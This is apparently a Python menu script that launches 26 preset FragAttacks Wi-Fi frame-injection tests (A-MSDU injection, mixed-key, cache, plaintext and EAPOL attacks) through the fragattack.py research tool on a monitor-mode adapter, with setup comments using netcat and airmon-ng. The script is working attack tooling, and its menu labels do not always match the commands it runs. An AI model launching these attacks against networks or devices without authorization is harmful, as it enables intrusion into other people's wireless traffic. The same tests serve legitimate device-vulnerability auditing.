#!/bin/python3
# Author: D3adpenguin
# Happy Hunting
# Use netcat to transfer the py file straight into the /fragattacks/research/ DIR
# nc -w 3 [IP] [PORT] < FragAtk.py
# to change adapter name do: 'ip link set [ADPATER] name wlan1' ; then use: 'airmong-ng start wlan1' to put in monitor mode
import os
import sys
import subprocess

print("This script will use wlan0mon as the network card")
print("All CMDs will be appended with --broadcast-dst")
print("To be used with Live OS from researcher")
print("Must be ran from ~/fragattacks/research/ Directory -OR- wherever your fragattack.py is located")

print("""
---Sanity Check---
1. ping
2. ping I,E,E
---Basic Device Behavior---
3. ping I,E,E --delay 5
4. ping-frag-sep
5. ping-frag-sep --pn-per-qos
---A-MSDU attacks---
6. ping I,E --amsdu
7. amsdu-inject
8. amsdu-inject-bad
---Mixed Key Attacks---
(TEST OUTSIDE THIS FRAMEWORK!!!)
9. ping I,F,BE,AE
10. ping I,F,BE,AE --pn-per-qos
---Cache Attacks---
11. ping I,E,R,AE
12. ping I,E,R,E
13. ping I,E,R,AE --full-recon
14. ping I,E,R,E --full-recon
---NonConsecutive PNs Attack---
15. ping I,E,E --inc-pn 2
---Mixed plain/encrypt Attacks
16. ping I,E,P
17. ping I,P,E
18. ping I,P
19. ping I,P,P
20. linux-plain
---Broadcast Fragment Attack---
21. ping I,D,P --bcast-ra
22. ping D,BP --bcast-ra
---A-MSDU EAPOL Attack---
23. eapol-amsdu I,P
24. eapol-amsdu BP
25. eapol-amsdu-bad I,P
26. eapol-amsdu-bad BP""")

while True:
    sel = int(input("\n Choice? \n"))
    if sel == 1:
       subprocess.run(["./fragattack.py", "wlan0mon", "ping", "--bcast-dst"])
    elif sel == 2:
        subprocess.run(["./fragattack.py", "wlan0mon", "ping", "I,E,E", "--bcast-dst"])
    elif sel == 3:
        subprocess.run(["./fragattack.py", "wlan0mon", "ping", "I,E,E", "--delay", "5", "--bcast-dst"])
    elif sel == 4:
        subprocess.run(["./fragattack.py", "wlan0mon", "ping-frag-sep", "--bcast-dst"])
    elif sel == 5:
        subprocess.run(["./fragattack.py", "wlan0mon", "ping-frag-sep", "--pn-per-qos", "--bcast-dst"])
    elif sel== 6:
        subprocess.run(["./fragattack.py", "wlan0mon", "ping", "I,E", "--amsdu", "--bcast-dst"])
    elif sel== 7:
        subprocess.run(["./fragattack.py", "wlan0mon", "amsdu-inject", "--bcast-dst"])
    elif sel== 8:
        subprocess.run(["./fragattack.py", "wlan0mon", "amsdu-inject-bad", "--bcast-dst"])
    elif sel== 9:
        subprocess.run(["./fragattack.py", "wlan0mon", "ping", "I,F,BE,AE", "--bcast-dst"], timeout=45)
    elif sel== 10:
        subprocess.run(["./fragattack.py", "wlan0mon", "ping", "I,F,BE,AE", "--pn-per-qos", "--bcast-dst"], timeout=45)
    elif sel== 11:
        subprocess.run(["./fragattack.py", "wlan0mon", "ping", "I,E,R,AE", "--bcast-dst"])
    elif sel== 12:
        subprocess.run(["./fragattack.py", "wlan0mon", "ping", "I,E,R,E", "--bcast-dst"])
    elif sel==13:
        subprocess.run(["./fragattack.py", "wlan0mon", "ping", "I,E,R,AE", "--full-recon", "--bcast-dst"])
    elif sel==14:
        subprocess.run(["./fragattack.py", "wlan0mon", "ping", "I,E,R,E", "--full-recon", "--bcast-dst"])
    elif sel ==15:
        subprocess.run(["./fragattack.py", "wlan0mon", "ping", "I,E,E", "--inc-pn", "2", "--bcast-dst"])
    elif sel== 16:
        subprocess.run(["./fragattack.py", "wlan0mon", "ping", "I,E,P", "--bcast-dst"])
    elif sel== 17:
        subprocess.run(["./fragattack.py", "wlan0mon", "ping", "I,P,E", "--bcast-dst"])
    elif sel== 18:
        subprocess.run(["./fragattack.py", "wlan0mon", "ping", "I,P", "--bcast-dst"])
    elif sel== 19:
        subprocess.run(["./fragattack.py", "wlan0mon", "ping", "I,P,P", "--bcast-dst"])
    elif sel== 20:
        subprocess.run(["./fragattack.py", "wlan0mon", "linux-plain", "--bcast-dst"])
    elif sel== 21:
        subprocess.run(["./fragattack.py", "wlan0mon", "ping", "I,D,P", "--bcast-ra", "--bcast-dst"])
    elif sel== 22:
        subprocess.run(["./fragattack.py", "wlan0mon", "ping", "BP", "--bcast-ra", "--bcast-dst"])
    elif sel== 23:
        subprocess.run(["./fragattack.py", "wlan0mon", "eapol-amsdu", "I,P", "--bcast-dst"])
    elif sel== 24:
        subprocess.run(["./fragattack.py", "wlan0mon", "eapol-amsdu", "BP", "--bcast-dst"])
    elif sel== 25:
        subprocess.run(["./fragattack.py", "wlan0mon", "eapol-amsdu-bad", "I,P", "--bcast-dst"])
    elif sel== 26:
        subprocess.run(["./fragattack.py", "wlan0mon", "eapol-amsdu-bad", "D", "BP", "--bcast-dst"])
    else:
        print("bad option")
